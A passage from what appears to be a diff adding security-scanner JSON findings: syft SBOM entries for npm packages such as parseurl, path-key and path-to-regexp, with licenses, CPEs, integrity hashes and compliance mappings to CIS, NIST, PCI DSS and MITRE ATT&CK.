1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "09bae738f1e39a33", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: parseley 0.12.1", + "title": "parseley 0.12.1", + "description": "Package discovered: parseley 0.12.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "22f6c66ddf9c06f1", + "name": "parseley", + "version": "0.12.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/parseley@0.12.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz", + "integrity": "sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw==", + "dependencies": { + "leac": "^0.6.0", + "peberminta": "^0.9.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "37de8d05673d8403", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: parseurl 1.3.3", + "title": "parseurl 1.3.3", + "description": "Package discovered: parseurl 1.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "484c0b9a6084b4bb", + "name": "parseurl", + "version": "1.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/parseurl@1.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4b3d2fa0f1f98ea0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-exists 4.0.0", + "title": "path-exists 4.0.0", + "description": "Package discovered: path-exists 4.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7c130f49f1f39739", + "name": "path-exists", + "version": "4.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/path-exists@4.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5bb936b7686247f0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-expression-matcher 1.5.0", + "title": "path-expression-matcher 1.5.0", + "description": "Package discovered: path-expression-matcher 1.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "802e4db060f878e6", + "name": "path-expression-matcher", + "version": "1.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/path-expression-matcher@1.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz", + "integrity": "sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ffd71e909718c27d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-key 3.1.1", + "title": "path-key 3.1.1", + "description": "Package discovered: path-key 3.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f9cf628256388076", + "name": "path-key", + "version": "3.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/path-key@3.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fbb7614ee3db4371", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-parse 1.0.7", + "title": "path-parse 1.0.7", + "description": "Package discovered: path-parse 1.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9cf335be710ffc91", + "name": "path-parse", + "version": "1.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/path-parse@1.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "135178fee69fc7b7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-scurry 1.11.1", + "title": "path-scurry 1.11.1", + "description": "Package discovered: path-scurry 1.11.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f605927959537dfd", + "name": "path-scurry", + "version": "1.11.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BlueOak-1.0.0", + "spdxExpression": "BlueOak-1.0.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/path-scurry@1.11.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", + "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", + "dependencies": { + "lru-cache": "^10.2.0", + "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ad5632f7c396e60c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: path-to-regexp 0.1.13", + "title": "path-to-regexp 0.1.13", + "description": "Package discovered: path-to-regexp 0.1.13", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6c60d0f52ae43b7", + "name": "path-to-regexp", + "version": "0.1.13", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/path-to-regexp@0.1.13", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz", + "integrity": "sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c2433fd071fcfad6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: peberminta 0.9.0", + "title": "peberminta 0.9.0", + "description": "Package discovered: peberminta 0.9.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": 